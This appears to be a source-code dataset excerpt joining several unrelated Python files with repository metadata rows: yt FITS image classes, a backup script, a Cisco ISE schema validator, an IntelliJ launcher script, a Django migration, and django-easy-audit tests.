to the `aplpy.FITSFigure` constructor.
"""
import aplpy
return aplpy.FITSFigure(self.hdulist, **kwargs)
def get_data(self, field):
"""
Return the data array of the image corresponding to *field*
with units attached. Deprecated.
"""
return self[field].data
def set_unit(self, field, units):
"""
Set the units of *field* to *units*.
"""
if field not in self.keys():
raise KeyError("%s not an image!" % field)
idx = self.fields.index(field)
new_data = YTArray(self.hdulist[idx].data,
self.field_units[field]).to(units)
self.hdulist[idx].data = new_data.v
self.hdulist[idx].header["bunit"] = units
self.field_units[field] = units
def pop(self, key):
"""
Remove a field with name *key*
and return it as a new FITSImageData
instance.
"""
if key not in self.keys():
raise KeyError("%s not an image!" % key)
idx = self.fields.index(key)
im = self.hdulist.pop(idx)
self.field_units.pop(key)
self.fields.remove(key)
data = _astropy.pyfits.HDUList([im])
return FITSImageData(data)
def close(self):
self.hdulist.close()
@classmethod
def from_file(cls, filename):
"""
Generate a FITSImageData instance from one previously written to
disk.
Parameters
----------
filename : string
The name of the file to open.
"""
f = _astropy.pyfits.open(filename, lazy_load_hdus=False)
return cls(f)
@classmethod
def from_images(cls, image_list):
"""
Generate a new FITSImageData instance from a list of FITSImageData
instances.
Parameters
----------
image_list : list of FITSImageData instances
The images to be combined.
"""
w = image_list[0].wcs
img_shape = image_list[0].shape
data = []
first = True
for fid in image_list:
assert_same_wcs(w, fid.wcs)
if img_shape != fid.shape:
raise RuntimeError("Images do not have the same shape!")
for hdu in fid.hdulist:
if first:
data.append(hdu)
first = False
else:
data.append(_astropy.pyfits.ImageHDU(hdu.data, header=hdu.header))
data = _astropy.pyfits.HDUList(data)
return cls(data)
def create_sky_wcs(self, sky_center, sky_scale,
ctype=["RA---TAN","DEC--TAN"],
crota=None, cd=None, pc=None,
wcsname="celestial",
replace_old_wcs=True):
"""
Takes a Cartesian WCS and converts it to one in a
celestial coordinate system.
Parameters
----------
sky_center : iterable of floats
Reference coordinates of the WCS in degrees.
sky_scale : tuple or YTQuantity
Conversion between an angle unit and a length unit,
e.g. (3.0, "arcsec/kpc")
ctype : list of strings, optional
The type of the coordinate system to create.
crota : 2-element ndarray, optional
Rotation angles between cartesian coordinates and
the celestial coordinates.
cd : 2x2-element ndarray, optional
Dimensioned coordinate transformation matrix.
pc : 2x2-element ndarray, optional
Coordinate transformation matrix.
replace_old_wcs : boolean, optional
Whether or not to overwrite the default WCS of the
FITSImageData instance. If false, a second WCS will
be added to the header. Default: True.
"""
old_wcs = self.wcs
naxis = old_wcs.naxis
crval = [sky_center[0], sky_center[1]]
if isinstance(sky_scale, YTQuantity):
scaleq = sky_scale
else:
scaleq = YTQuantity(sky_scale[0],sky_scale[1])
if scaleq.units.dimensions != dimensions.angle/dimensions.length:
raise RuntimeError("sky_scale %s not in correct " % sky_scale +
"dimensions of angle/length!")
deltas = old_wcs.wcs.cdelt
units = [str(unit) for unit in old_wcs.wcs.cunit]
new_dx = (YTQuantity(-deltas[0], units[0])*scaleq).in_units("deg")
new_dy = (YTQuantity(deltas[1], units[1])*scaleq).in_units("deg")
new_wcs = _astropy.pywcs.WCS(naxis=naxis)
cdelt = [new_dx.v, new_dy.v]
cunit = ["deg"]*2
if naxis == 3:
crval.append(old_wcs.wcs.crval[2])
cdelt.append(old_wcs.wcs.cdelt[2])
ctype.append(old_wcs.wcs.ctype[2])
cunit.append(old_wcs.wcs.cunit[2])
new_wcs.wcs.crpix = old_wcs.wcs.crpix
new_wcs.wcs.cdelt = cdelt
new_wcs.wcs.crval = crval
new_wcs.wcs.cunit = cunit
new_wcs.wcs.ctype = ctype
if crota is not None:
new_wcs.wcs.crota = crota
if cd is not None:
new_wcs.wcs.cd = cd
if pc is not None:
new_wcs.wcs.cd = pc
if replace_old_wcs:
self.set_wcs(new_wcs, wcsname=wcsname)
else:
self.set_wcs(new_wcs, wcsname=wcsname, suffix="a")
class FITSImageBuffer(FITSImageData):
pass
def sanitize_fits_unit(unit):
if unit == "Mpc":
mylog.info("Changing FITS file unit to kpc.")
unit = "kpc"
elif unit == "au":
unit = "AU"
return unit
axis_wcs = [[1,2],[0,2],[0,1]]
def construct_image(ds, axis, data_source, center, width=None, image_res=None):
if width is None:
width = ds.domain_width[axis_wcs[axis]]
unit = ds.get_smallest_appropriate_unit(width[0])
mylog.info("Making an image of the entire domain, "+
"so setting the center to the domain center.")
else:
width = ds.coordinates.sanitize_width(axis, width, None)
unit = str(width[0].units)
if image_res is None:
ddims = ds.domain_dimensions*ds.refine_by**ds.index.max_level
if iterable(axis):
nx = ddims.max()
ny = ddims.max()
else:
nx, ny = [ddims[idx] for idx in axis_wcs[axis]]
else:
if iterable(image_res):
nx, ny = image_res
else:
nx, ny = image_res, image_res
dx = width[0]/nx
dy = width[1]/ny
crpix = [0.5*(nx+1), 0.5*(ny+1)]
if unit == "unitary":
unit = ds.get_smallest_appropriate_unit(ds.domain_width.max())
elif unit == "code_length":
unit = ds.get_smallest_appropriate_unit(ds.quan(1.0, "code_length"))
unit = sanitize_fits_unit(unit)
cunit = [unit]*2
ctype = ["LINEAR"]*2
cdelt = [dx.in_units(unit), dy.in_units(unit)]
if iterable(axis):
crval = center.in_units(unit)
else:
crval = [center[idx].in_units(unit) for idx in axis_wcs[axis]]
if hasattr(data_source, 'to_frb'):
if iterable(axis):
frb = data_source.to_frb(width[0], (nx, ny), height=width[1])
else:
frb = data_source.to_frb(width[0], (nx, ny), center=center,
height=width[1])
else:
frb = None
w = _astropy.pywcs.WCS(naxis=2)
w.wcs.crpix = crpix
w.wcs.cdelt = cdelt
w.wcs.crval = crval
w.wcs.cunit = cunit
w.wcs.ctype = ctype
return w, frb
def assert_same_wcs(wcs1, wcs2):
from numpy.testing import assert_allclose
assert wcs1.naxis == wcs2.naxis
for i in range(wcs1.naxis):
assert wcs1.wcs.cunit[i] == wcs2.wcs.cunit[i]
assert wcs1.wcs.ctype[i] == wcs2.wcs.ctype[i]
assert_allclose(wcs1.wcs.crpix, wcs2.wcs.crpix)
assert_allclose(wcs1.wcs.cdelt, wcs2.wcs.cdelt)
assert_allclose(wcs1.wcs.crval, wcs2.wcs.crval)
crota1 = getattr(wcs1.wcs, "crota", None)
crota2 = getattr(wcs2.wcs, "crota", None)
if crota1 is None or crota2 is None:
assert crota1 == crota2
else:
assert_allclose(wcs1.wcs.crota, wcs2.wcs.crota)
cd1 = getattr(wcs1.wcs, "cd", None)
cd2 = getattr(wcs2.wcs, "cd", None)
if cd1 is None or cd2 is None:
assert cd1 == cd2
else:
assert_allclose(wcs1.wcs.cd, wcs2.wcs.cd)
pc1 = getattr(wcs1.wcs, "pc", None)
pc2 = getattr(wcs2.wcs, "pc", None)
if pc1 is None or pc2 is None:
assert pc1 == pc2
else:
assert_allclose(wcs1.wcs.pc, wcs2.wcs.pc)
class FITSSlice(FITSImageData):
r"""
Generate a FITSImageData of an on-axis slice.
Parameters
----------
ds : :class:`~yt.data_objects.static_output.Dataset`
The dataset object.
axis : character or integer
The axis of the slice. One of "x","y","z", or 0,1,2.
fields : string or list of strings
The fields to slice
center : A sequence of floats, a string, or a tuple.
The coordinate of the center of the image. If set to 'c', 'center' or
left blank, the plot is centered on the middle of the domain. If set
to 'max' or 'm', the center will be located at the maximum of the
('gas', 'density') field. Centering on the max or min of a specific
field is supported by providing a tuple such as ("min","temperature")
or ("max","dark_matter_density"). Units can be specified by passing in
*center* as a tuple containing a coordinate and string unit name or by
passing in a YTArray. If a list or unitless array is supplied, code
units are assumed.
width : tuple or a float.
Width can have four different formats to support windows with variable
x and y widths. They are:
================================== =======================
format example
================================== =======================
(float, string) (10,'kpc')
((float, string), (float, string)) ((10,'kpc'),(15,'kpc'))
float 0.2
(float, float) (0.2, 0.3)
================================== =======================
For example, (10, 'kpc') requests a plot window that is 10 kiloparsecs
wide in the x and y directions, ((10,'kpc'),(15,'kpc')) requests a
window that is 10 kiloparsecs wide along the x axis and 15
kiloparsecs wide along the y axis. In the other two examples, code
units are assumed, for example (0.2, 0.3) requests a plot that has an
x width of 0.2 and a y width of 0.3 in code units. If units are
provided the resulting plot axis labels will use the supplied units.
image_res : an int or 2-tuple of ints
Specify the resolution of the resulting image. If not provided, it will
be determined based on the minimum cell size of the dataset.
"""
def __init__(self, ds, axis, fields, center="c", width=None,
image_res=None, **kwargs):
fields = ensure_list(fields)
axis = fix_axis(axis, ds)
center, dcenter = ds.coordinates.sanitize_center(center, axis)
slc = ds.slice(axis, center[axis], **kwargs)
w, frb = construct_image(ds, axis, slc, dcenter, width=width,
image_res=image_res)
super(FITSSlice, self).__init__(frb, fields=fields, wcs=w)
class FITSProjection(FITSImageData):
r"""
Generate a FITSImageData of an on-axis projection.
Parameters
----------
ds : :class:`~yt.data_objects.static_output.Dataset`
The dataset object.
axis : character or integer
The axis along which to project. One of "x","y","z", or 0,1,2.
fields : string or list of strings
The fields to project
weight_field : string
The field used to weight the projection.
center : A sequence of floats, a string, or a tuple.
The coordinate of the center of the image. If set to 'c', 'center' or
left blank, the plot is centered on the middle of the domain. If set
to 'max' or 'm', the center will be located at the maximum of the
('gas', 'density') field. Centering on the max or min of a specific
field is supported by providing a tuple such as ("min","temperature")
or ("max","dark_matter_density"). Units can be specified by passing in
*center* as a tuple containing a coordinate and string unit name or by
passing in a YTArray. If a list or unitless array is supplied, code
units are assumed.
width : tuple or a float.
Width can have four different formats to support windows with variable
x and y widths. They are:
================================== =======================
format example
================================== =======================
(float, string) (10,'kpc')
((float, string), (float, string)) ((10,'kpc'),(15,'kpc'))
float 0.2
(float, float) (0.2, 0.3)
================================== =======================
For example, (10, 'kpc') requests a plot window that is 10 kiloparsecs
wide in the x and y directions, ((10,'kpc'),(15,'kpc')) requests a
window that is 10 kiloparsecs wide along the x axis and 15
kiloparsecs wide along the y axis. In the other two examples, code
units are assumed, for example (0.2, 0.3) requests a plot that has an
x width of 0.2 and a y width of 0.3 in code units. If units are
provided the resulting plot axis labels will use the supplied units.
image_res : an int or 2-tuple of ints
Specify the resolution of the resulting image. If not provided, it will
be determined based on the minimum cell size of the dataset.
"""
def __init__(self, ds, axis, fields, center="c", width=None,
weight_field=None, image_res=None, **kwargs):
fields = ensure_list(fields)
axis = fix_axis(axis, ds)
center, dcenter = ds.coordinates.sanitize_center(center, axis)
prj = ds.proj(fields[0], axis, weight_field=weight_field, **kwargs)
w, frb = construct_image(ds, axis, prj, dcenter, width=width,
image_res=image_res)
super(FITSProjection, self).__init__(frb, fields=fields, wcs=w)
class FITSOffAxisSlice(FITSImageData):
r"""
Generate a FITSImageData of an off-axis slice.
Parameters
----------
ds : :class:`~yt.data_objects.static_output.Dataset`
The dataset object.
normal : a sequence of floats
The vector normal to the projection plane.
fields : string or list of strings
The fields to slice
center : A sequence of floats, a string, or a tuple.
The coordinate of the center of the image. If set to 'c', 'center' or
left blank, the plot is centered on the middle of the domain. If set to
'max' or 'm', the center will be located at the maximum of the
('gas', 'density') field. Centering on the max or min of a specific
field is supported by providing a tuple such as ("min","temperature")
or ("max","dark_matter_density"). Units can be specified by passing in
*center* as a tuple containing a coordinate and string unit name or by
passing in a YTArray. If a list or unitless array is supplied, code
units are assumed.
width : tuple or a float.
Width can have four different formats to support windows with variable
x and y widths. They are:
================================== =======================
format example
================================== =======================
(float, string) (10,'kpc')
((float, string), (float, string)) ((10,'kpc'),(15,'kpc'))
float 0.2
(float, float) (0.2, 0.3)
================================== =======================
For example, (10, 'kpc') requests a plot window that is 10 kiloparsecs
wide in the x and y directions, ((10,'kpc'),(15,'kpc')) requests a
window that is 10 kiloparsecs wide along the x axis and 15
kiloparsecs wide along the y axis. In the other two examples, code
units are assumed, for example (0.2, 0.3) requests a plot that has an
x width of 0.2 and a y width of 0.3 in code units. If units are
provided the resulting plot axis labels will use the supplied units.
image_res : an int or 2-tuple of ints
Specify the resolution of the resulting image.
north_vector : a sequence of floats
A vector defining the 'up' direction in the plot. This
option sets the orientation of the slicing plane. If not
set, an arbitrary grid-aligned north-vector is chosen.
"""
def __init__(self, ds, normal, fields, center='c', width=None,
image_res=512, north_vector=None):
fields = ensure_list(fields)
center, dcenter = ds.coordinates.sanitize_center(center, 4)
cut = ds.cutting(normal, center, north_vector=north_vector)
center = ds.arr([0.0] * 2, 'code_length')
w, frb = construct_image(ds, normal, cut, center, width=width,
image_res=image_res)
super(FITSOffAxisSlice, self).__init__(frb, fields=fields, wcs=w)
class FITSOffAxisProjection(FITSImageData):
r"""
Generate a FITSImageData of an off-axis projection.
Parameters
----------
ds : :class:`~yt.data_objects.static_output.Dataset`
This is the dataset object corresponding to the
simulation output to be plotted.
normal : a sequence of floats
The vector normal to the projection plane.
fields : string, list of strings
The name of the field(s) to be plotted.
center : A sequence of floats, a string, or a tuple.
The coordinate of the center of the image. If set to 'c', 'center' or
left blank, the plot is centered on the middle of the domain. If set
to 'max' or 'm', the center will be located at the maximum of the
('gas', 'density') field. Centering on the max or min of a specific
field is supported by providing a tuple such as ("min","temperature")
or ("max","dark_matter_density"). Units can be specified by passing in
*center* as a tuple containing a coordinate and string unit name or by
passing in a YTArray. If a list or unitless array is supplied, code
units are assumed.
width : tuple or a float.
Width can have four different formats to support windows with variable
x and y widths. They are:
================================== =======================
format example
================================== =======================
(float, string) (10,'kpc')
((float, string), (float, string)) ((10,'kpc'),(15,'kpc'))
float 0.2
(float, float) (0.2, 0.3)
================================== =======================
For example, (10, 'kpc') requests a plot window that is 10 kiloparsecs
wide in the x and y directions, ((10,'kpc'),(15,'kpc')) requests a
window that is 10 kiloparsecs wide along the x axis and 15
kiloparsecs wide along the y axis. In the other two examples, code
units are assumed, for example (0.2, 0.3) requests a plot that has an
x width of 0.2 and a y width of 0.3 in code units. If units are
provided the resulting plot axis labels will use the supplied units.
depth : A tuple or a float
A tuple containing the depth to project through and the string
key of the unit: (width, 'unit'). If set to a float, code units
are assumed
weight_field : string
The name of the weighting field. Set to None for no weight.
image_res : an int or 2-tuple of ints
Specify the resolution of the resulting image.
north_vector : a sequence of floats
A vector defining the 'up' direction in the plot. This
option sets the orientation of the slicing plane. If not
set, an arbitrary grid-aligned north-vector is chosen.
method : string
The method of projection. Valid methods are:
"integrate" with no weight_field specified : integrate the requested
field along the line of sight.
"integrate" with a weight_field specified : weight the requested
field by the weighting field and integrate along the line of sight.
"sum" : This method is the same as integrate, except that it does not
multiply by a path length when performing the integration, and is
just a straight summation of the field along the given axis. WARNING:
This should only be used for uniform resolution grid datasets, as other
datasets may result in unphysical images.
data_source : yt.data_objects.data_containers.YTSelectionContainer, optional
If specified, this will be the data source used for selecting regions
to project.
"""
def __init__(self, ds, normal, fields, center='c', width=(1.0, 'unitary'),
weight_field=None, image_res=512, data_source=None,
north_vector=None, depth=(1.0, "unitary"), method='integrate'):
fields = ensure_list(fields)
center, dcenter = ds.coordinates.sanitize_center(center, 4)
buf = {}
width = ds.coordinates.sanitize_width(normal, width, depth)
wd = tuple(el.in_units('code_length').v for el in width)
if not iterable(image_res):
image_res = (image_res, image_res)
res = (image_res[0], image_res[1])
if data_source is None:
source = ds
else:
source = data_source
for field in fields:
buf[field] = off_axis_projection(source, center, normal, wd,
res, field, north_vector=north_vector,
method=method, weight=weight_field).swapaxes(0,1)
center = ds.arr([0.0] * 2, 'code_length')
w, not_an_frb = construct_image(ds, normal, buf, center, width=width, image_res=image_res)
super(FITSOffAxisProjection, self).__init__(buf, fields=fields, wcs=w)
| 42.257525 | 98 | 0.565361 |
f51c10b75c2043f6e61e0dbf4006ed5364f7fbcb | 925 | py | Python | src/auto_backup.py | polmonroig/auto_backup | c484ceb4df27990af0ba8fee6417780cb603150d | [
"MIT"
] | null | null | null | src/auto_backup.py | polmonroig/auto_backup | c484ceb4df27990af0ba8fee6417780cb603150d | [
"MIT"
] | null | null | null | src/auto_backup.py | polmonroig/auto_backup | c484ceb4df27990af0ba8fee6417780cb603150d | [
"MIT"
] | null | null | null | #!/usr/bin/python3
from version import __version__
from parser import Parser
from database import ProjectDatabase
import os
import sys
def interactive(database):
parser = Parser()
exe = os.path.dirname(os.path.realpath(__file__))
exe = exe.split('/')
init_file = '/'
for file in exe:
init_file = os.path.join(init_file, file)
init_file = os.path.join(init_file, '.config')
for action in parser.read_file(init_file):
database.interact(action)
for action in parser.loop():
database.interact(action)
def scripting(database):
path = sys.argv[1]
parser = Parser()
for action in parser.read_file(path):
database.interact(action)
def main():
print('Backup utility', __version__)
database = ProjectDatabase()
if len(sys.argv) >= 2:
scripting(database)
else:
interactive(database)
if __name__ == '__main__':
main()
| 23.125 | 53 | 0.662703 |
aa6dab182a7914b15841b8011da84dbb72bdae19 | 3,187 | py | Python | tests/models/validators/v3_0_0/jsd_f52605b5f6481f6a99ec8a7e8e6.py | oianson/ciscoisesdk | c8fe9d80416048dd0ff2241209c4f78ab78c1a4a | [
"MIT"
] | null | null | null | tests/models/validators/v3_0_0/jsd_f52605b5f6481f6a99ec8a7e8e6.py | oianson/ciscoisesdk | c8fe9d80416048dd0ff2241209c4f78ab78c1a4a | [
"MIT"
] | null | null | null | tests/models/validators/v3_0_0/jsd_f52605b5f6481f6a99ec8a7e8e6.py | oianson/ciscoisesdk | c8fe9d80416048dd0ff2241209c4f78ab78c1a4a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Identity Services Engine getTelemetryInfoById data model.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import fastjsonschema
import json
from ciscoisesdk.exceptions import MalformedRequest
from builtins import *
class JSONSchemaValidatorF52605B5F6481F6A99Ec8A7E8E6(object):
"""getTelemetryInfoById request schema definition."""
def __init__(self):
super(JSONSchemaValidatorF52605B5F6481F6A99Ec8A7E8E6, self).__init__()
self._validator = fastjsonschema.compile(json.loads(
'''{
"$schema": "http://json-schema.org/draft-04/schema#",
"properties": {
"TelemetryInfo": {
"properties": {
"deploymentId": {
"type": "string"
},
"id": {
"type": "string"
},
"link": {
"properties": {
"href": {
"type": "string"
},
"rel": {
"type": "string"
},
"type": {
"type": "string"
}
},
"required": [
"rel",
"href",
"type"
],
"type": "object"
},
"status": {
"type": "string"
},
"udiSN": {
"type": "string"
}
},
"type": "object"
}
},
"required": [
"TelemetryInfo"
],
"type": "object"
}'''.replace("\n" + ' ' * 16, '')
))
def validate(self, request):
try:
self._validator(request)
except fastjsonschema.exceptions.JsonSchemaException as e:
raise MalformedRequest(
'{} is invalid. Reason: {}'.format(request, e.message)
)
| 32.191919 | 78 | 0.54534 |
cb9bcfbbb30db5822b8574bcf9489b251dba37fc | 3,120 | py | Python | src/idea/idea_start.py | AldrichYang/HelloPython3 | de3d3f3cf293980a7e11aaa488a2621035efc599 | [
"Apache-2.0"
] | null | null | null | src/idea/idea_start.py | AldrichYang/HelloPython3 | de3d3f3cf293980a7e11aaa488a2621035efc599 | [
"Apache-2.0"
] | null | null | null | src/idea/idea_start.py | AldrichYang/HelloPython3 | de3d3f3cf293980a7e11aaa488a2621035efc599 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import struct
import sys
import os
import time
# see com.intellij.idea.SocketLock for the server side of this interface
RUN_PATH = u'/Applications/IntelliJ IDEA.app'
CONFIG_PATH = u'/Users/user/Library/Preferences/IntelliJIdea2018.1'
SYSTEM_PATH = u'/Users/user/Library/Caches/IntelliJIdea2018.1'
def print_usage(cmd):
print(('Usage:\n' +
' {0} -h | -? | --help\n' +
' {0} [project_dir]\n' +
' {0} [-l|--line line] [project_dir|--temp-project] file[:line]\n' +
' {0} diff <left> <right>\n' +
' {0} merge <local> <remote> [base] <merged>').format(cmd))
def process_args(argv):
args = []
skip_next = False
for i, arg in enumerate(argv[1:]):
if arg == '-h' or arg == '-?' or arg == '--help':
print_usage(argv[0])
exit(0)
elif i == 0 and (arg == 'diff' or arg == 'merge' or arg == '--temp-project'):
args.append(arg)
elif arg == '-l' or arg == '--line':
args.append(arg)
skip_next = True
elif skip_next:
args.append(arg)
skip_next = False
else:
path = arg
if ':' in arg:
file_path, line_number = arg.rsplit(':', 1)
if line_number.isdigit():
args.append('-l')
args.append(line_number)
path = file_path
args.append(os.path.abspath(path))
return args
def try_activate_instance(args):
port_path = os.path.join(CONFIG_PATH, 'port')
token_path = os.path.join(SYSTEM_PATH, 'token')
if not (os.path.exists(port_path) and os.path.exists(token_path)):
return False
with open(port_path) as pf:
port = int(pf.read())
with open(token_path) as tf:
token = tf.read()
s = socket.socket()
s.settimeout(0.3)
try:
s.connect(('127.0.0.1', port))
except (socket.error, IOError):
return False
found = False
while True:
try:
path_len = struct.unpack('>h', s.recv(2))[0]
path = s.recv(path_len).decode('utf-8')
if os.path.abspath(path) == os.path.abspath(CONFIG_PATH):
found = True
break
except (socket.error, IOError):
return False
if found:
cmd = 'activate ' + token + '\0' + os.getcwd() + '\0' + '\0'.join(args)
if sys.version_info.major >= 3: cmd = cmd.encode('utf-8')
encoded = struct.pack('>h', len(cmd)) + cmd
s.send(encoded)
time.sleep(0.5) # don't close the socket immediately
return True
return False
def start_new_instance(args):
if sys.platform == 'darwin':
if len(args) > 0:
args.insert(0, '--args')
os.execvp('open', ['-a', RUN_PATH] + args)
else:
bin_file = os.path.split(RUN_PATH)[1]
os.execv(RUN_PATH, [bin_file] + args)
ide_args = process_args(sys.argv)
if not try_activate_instance(ide_args):
start_new_instance(ide_args)
| 28.363636 | 85 | 0.546795 |
7282cd43987729ea642d1583bf120e197cdcc79d | 420 | py | Python | src/bullet_point/migrations/0006_bulletpoint_sift_risk_score.py | ResearchHub/ResearchHub-Backend-Open | d36dca33afae2d442690694bb2ab17180d84bcd3 | [
"MIT"
] | 18 | 2021-05-20T13:20:16.000Z | 2022-02-11T02:40:18.000Z | src/bullet_point/migrations/0006_bulletpoint_sift_risk_score.py | ResearchHub/ResearchHub-Backend-Open | d36dca33afae2d442690694bb2ab17180d84bcd3 | [
"MIT"
] | 109 | 2021-05-21T20:14:23.000Z | 2022-03-31T20:56:10.000Z | src/bullet_point/migrations/0006_bulletpoint_sift_risk_score.py | ResearchHub/ResearchHub-Backend-Open | d36dca33afae2d442690694bb2ab17180d84bcd3 | [
"MIT"
] | 4 | 2021-05-17T13:47:53.000Z | 2022-02-12T10:48:21.000Z | # Generated by Django 2.2 on 2020-11-07 01:03
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bullet_point', '0005_bulletpoint_created_location'),
]
operations = [
migrations.AddField(
model_name='bulletpoint',
name='sift_risk_score',
field=models.FloatField(blank=True, null=True),
),
]
| 22.105263 | 62 | 0.62619 |
a3b9a63ea5826bb1960b8ed7c191ae8d57b843c8 | 7,060 | py | Python | backend/apps/easyaudit/tests/test_app/tests.py | bopopescu/Journey | 654eb66e0e2df59e916eff4c75b68b183f9b58b5 | [
"MIT"
] | 41 | 2019-01-02T09:36:54.000Z | 2022-02-20T13:13:05.000Z | backend/apps/easyaudit/tests/test_app/tests.py | bopopescu/Journey | 654eb66e0e2df59e916eff4c75b68b183f9b58b5 | [
"MIT"
] | 15 | 2019-09-30T05:40:20.000Z | 2022-02-17T19:28:41.000Z | backend/apps/easyaudit/tests/test_app/tests.py | bopopescu/Journey | 654eb66e0e2df59e916eff4c75b68b183f9b58b5 | [
"MIT"
] | 23 | 2019-02-18T10:50:10.000Z | 2022-01-06T07:53:18.000Z | # -*- coding: utf-8 -*-
import json
import re
from django.test import TestCase, override_settings
from django.urls import reverse
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
import bs4
from test_app.models import TestModel, TestForeignKey, TestM2M
from easyaudit.models import CRUDEvent
from easyaudit.middleware.easyaudit import set_current_user, clear_request
TEST_USER_EMAIL = 'joe@example.com'
TEST_USER_PASSWORD = 'password'
TEST_ADMIN_EMAIL = 'admin@example.com'
TEST_ADMIN_PASSWORD = 'password'
@override_settings(TEST=True)
class TestAuditModels(TestCase):
def test_create_model(self):
obj = TestModel.objects.create()
self.assertEqual(obj.id, 1)
crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
self.assertEqual(1, crud_event_qs.count())
crud_event = crud_event_qs[0]
data = json.loads(crud_event.object_json_repr)[0]
self.assertEqual(data['fields']['name'], obj.name)
def test_fk_model(self):
obj = TestModel.objects.create()
obj_fk = TestForeignKey(name='test', test_fk=obj)
obj_fk.save()
crud_event = CRUDEvent.objects.filter(object_id=obj_fk.id, content_type=ContentType.objects.get_for_model(obj_fk))[0]
data = json.loads(crud_event.object_json_repr)[0]
self.assertEqual(data['fields']['test_fk'], obj.id)
def test_m2m_model(self):
obj = TestModel.objects.create()
obj_m2m = TestM2M(name='test')
obj_m2m.save()
obj_m2m.test_m2m.add(obj)
crud_event = CRUDEvent.objects.filter(object_id=obj_m2m.id, content_type=ContentType.objects.get_for_model(obj_m2m))[0]
data = json.loads(crud_event.object_json_repr)[0]
self.assertEqual(data['fields']['test_m2m'], [obj.id])
@override_settings(DJANGO_EASY_AUDIT_CRUD_EVENT_NO_CHANGED_FIELDS_SKIP=True)
def test_update_skip_no_changed_fields(self):
obj = TestModel.objects.create()
crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
self.assertEqual(1, crud_event_qs.count())
obj.name = 'changed name'
obj.save()
self.assertEqual(2, crud_event_qs.count())
last_change = crud_event_qs.first()
self.assertIn('name', last_change.changed_fields)
def test_update(self):
obj = TestModel.objects.create()
crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
self.assertEqual(1, crud_event_qs.count())
obj.name = 'changed name'
obj.save()
self.assertEqual(2, crud_event_qs.count())
last_change = crud_event_qs.first()
self.assertIn('name', last_change.changed_fields)
@override_settings(DJANGO_EASY_AUDIT_CRUD_EVENT_NO_CHANGED_FIELDS_SKIP=True)
def test_fake_update_skip_no_changed_fields(self):
obj = TestModel.objects.create()
crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
obj.save()
self.assertEqual(1, crud_event_qs.count())
def test_fake_update(self):
obj = TestModel.objects.create()
crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
obj.save()
self.assertEqual(2, crud_event_qs.count())
@override_settings(TEST=True)
class TestMiddleware(TestCase):
def _setup_user(self, email, password):
user = User(username=email)
user.set_password(password)
user.save()
return user
def _log_in_user(self, email, password):
login = self.client.login(username=email, password=password)
self.assertTrue(login)
def test_middleware_logged_in(self):
user = self._setup_user(TEST_USER_EMAIL, TEST_USER_PASSWORD)
self._log_in_user(TEST_USER_EMAIL, TEST_USER_PASSWORD)
create_obj_url = reverse("test_app:create-obj")
self.client.post(create_obj_url)
self.assertEqual(TestModel.objects.count(), 1)
obj = TestModel.objects.all()[0]
crud_event = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))[0]
self.assertEqual(crud_event.user, user)
def test_middleware_not_logged_in(self):
create_obj_url = reverse("test_app:create-obj")
self.client.post(create_obj_url)
self.assertEqual(TestModel.objects.count(), 1)
obj = TestModel.objects.all()[0]
crud_event = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))[0]
self.assertEqual(crud_event.user, None)
def test_manual_set_user(self):
user = self._setup_user(TEST_USER_EMAIL, TEST_USER_PASSWORD)
# set user/request
set_current_user(user)
obj = TestModel.objects.create()
self.assertEqual(obj.id, 1)
crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
self.assertEqual(crud_event_qs.count(), 1)
crud_event = crud_event_qs[0]
self.assertEqual(crud_event.user, user)
# clear request
clear_request()
obj = TestModel.objects.create()
self.assertEqual(obj.id, 2)
crud_event_qs = CRUDEvent.objects.filter(object_id=obj.id, content_type=ContentType.objects.get_for_model(obj))
self.assertEqual(crud_event_qs.count(), 1)
crud_event = crud_event_qs[0]
self.assertEqual(crud_event.user, None)
@override_settings(TEST=True)
class TestAuditAdmin(TestCase):
def _setup_superuser(self, email, password):
admin = User.objects.create_superuser(email, email, TEST_ADMIN_PASSWORD)
admin.save()
return admin
def _log_in_user(self, email, password):
login = self.client.login(username=email, password=password)
self.assertTrue(login)
def _list_filters(self, content):
"""
Extract filters from response content;
example:
<div id="changelist-filter">
<h2>Filter</h2>
<h3> By method </h3>
...
<h3> By datetime </h3>
...
</div>
returns:
['method', 'datetime', ]
"""
html = str(bs4.BeautifulSoup(content, features="html.parser").find(id="changelist-filter"))
filters = re.findall('<h3>\s*By\s*(.*?)\s*</h3>', html)
return filters
def test_request_event_admin_no_users(self):
self._setup_superuser(TEST_ADMIN_EMAIL, TEST_ADMIN_PASSWORD)
